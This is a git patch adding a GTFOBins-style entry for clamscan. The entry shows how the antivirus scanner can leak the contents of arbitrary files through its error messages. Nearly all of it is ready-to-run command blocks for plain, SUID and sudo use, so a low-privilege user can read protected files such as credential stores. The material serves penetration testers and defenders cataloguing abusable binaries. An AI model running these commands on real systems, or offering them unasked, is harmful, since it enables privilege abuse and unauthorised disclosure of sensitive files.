From 5b93637ab41a305f769ebbd3d2d67de624357b6c Mon Sep 17 00:00:00 2001
From: pad0van <46479117+pad0van@users.noreply.github.com>
Date: Sat, 2 Sep 2023 15:51:45 +0800
Subject: [PATCH] Add clamscan

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/clamscan.md | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 _gtfobins/clamscan.md

diff --git a/_gtfobins/clamscan.md b/_gtfobins/clamscan.md
new file mode 100644
index 0000000..d29d668
--- /dev/null
+++ b/_gtfobins/clamscan.md
@@ -0,0 +1,22 @@
+---
+description: Each line of the file is interpreted as a path and the content is leaked via error messages, thus this might not be suitable to read binary files. The output can optionally be cleaned using `sed`.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        TF=$(mktemp -d)
+        touch $TF/empty.yara
+        clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
+  suid:
+    - code: |
+        LFILE=file_to_read
+        TF=$(mktemp -d)
+        touch $TF/empty.yara
+        ./clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        TF=$(mktemp -d)
+        touch $TF/empty.yara
+        sudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
+---